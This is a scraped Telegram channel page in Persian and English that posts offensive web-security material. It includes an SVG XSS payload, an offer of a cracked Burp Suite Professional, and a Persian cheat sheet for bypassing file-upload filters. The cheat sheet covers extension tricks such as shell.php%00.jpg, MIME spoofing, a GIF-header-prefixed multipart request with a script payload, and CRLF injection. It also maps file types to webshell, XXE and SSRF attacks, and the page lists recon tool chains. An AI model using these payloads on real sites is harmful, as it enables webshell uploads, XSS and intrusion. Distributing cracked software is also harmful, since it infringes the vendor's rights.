CyberSecurity – Telegram
CyberSecurity
902 subscribers
122 photos
26 videos
73 files
146 links
Welcome to dark hell

‌ ما از دانش خود برای مهندسی دنیایی امن ‌تر استفاده می‌کنیم 🔐
Download Telegram
<?xml version="1.0" standalone="no"?>
<!DOCTYPE noscript PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/noscript11.dtd">

<noscript version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/noscript">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<noscript type="text/javanoscript">
alert('xss find by @matitanium security!');
</noscript>
</noscript>
burpsuite_pro_v2022.1.zip
503 MB
Burp Suite Professional v2022.1
😈 + Crack

Released 24 January 2022
نکاتی برای دور زدن محدودیدت آپلود فایل:

🔹 تغییر پسوند فایل ها

۱- افزودن کارکترهای خاص به انتهای پسوند فایل
مثال:
file.php%20
file.php%0a
file.php%00
file.php%0d%0a
file.php/
file.php.\
file.
file.php….
file.pHp5….

۲- استفاده از پسوند های دوگانه
مثال:
file.png.php
file.png.pHp5

۳- استفاده از نال بایت و داده جانک
مثال:
shell.php%00.jpg
shell.php%0delete0.jpg
file.phpJunk123png

۴- استفاده از حروف کوچک و بزرگ
مثال:
file.jPg
file.SvG
file.asP

۵- استفاده از HTTP Parameter Pollution در نام فایل
مثال:
filename=1.jpg&filename=.php

🔹 دور زدن اعتبارسنجی مقدار content-type با تغییر MIME type
مثال:
تبدیل
Content-type: application/x-php
به
Content-type: image/jpeg


🔹 دور زدن اعتبار سنجی هدر فایل
۱- فیلتر های بررسی کننده هدرfile signatures معمولا صحت ۴ بایت اول آن را مورد بررسی قرار می دهند که می توان بعد از آن کد مخرب را قرار داد
مثال:
-----------------------------6683303835495
Content-Disposition: form-data; name="upload"; filename="badfile.''gif"
Content-Type: image/png

GIF8
<html><noscript>alert('XSS is easy');</noscript></html>
-----------------------------6683303835495--

لیست هدرfile signatures:
https://en.wikipedia.org/wiki/List_of_file_signatures

۲- استفاده از CRLF در محتوای فایل
مثال:
x.png%22%0d%0a%0d%0a%0d%0a<noscript>alert(1)</noscript>

🔹در پایان لیستی آورده شده است که با کمک آن می توان فهمید پسوند های مختلف فایل به چه حملاتی می تواند منجر شود:
SVG: Stored XSS / SSRF / XXE
HTML / JS : HTML injection / XSS / Open redirect
ASP / ASPX / PHP5 / PHP / PHP3: Webshell / RCE
GIF: Stored XSS / SSRF
CSV: CSV injection
PNG / JPEG: Pixel flood attack (DoS)
ZIP: RCE via LFI / DoS
PDF / PPTX: SSRF / BLIND XXE
XML: XXE
AVI: LFI / SSRF

اطلاعات بیشتر در:
https://infosecwriteups.com/all-about-unrestricted-file-upload-a4ecf243b86b
https://anotherhackerblog.com/exploiting-file-uploads-pt1/
https://book.hacktricks.xyz/pentesting-web/file-upload
لیستی از بهترین موتورهای جستجو امنیتی برای آزمونگران امنیت
nmap -sV -A -> nikto -h -> amass -> subli3ter ->girtrob
آلت کیو بگیرم الان دختره احمق😂😂😂😂😂😂
dnsgen
burp turbo intruder
bugbountyhunting.com
temprory mail
by binwallk
CyberSecurity
https://wordlists.assetnote.io/
fuzz wordlist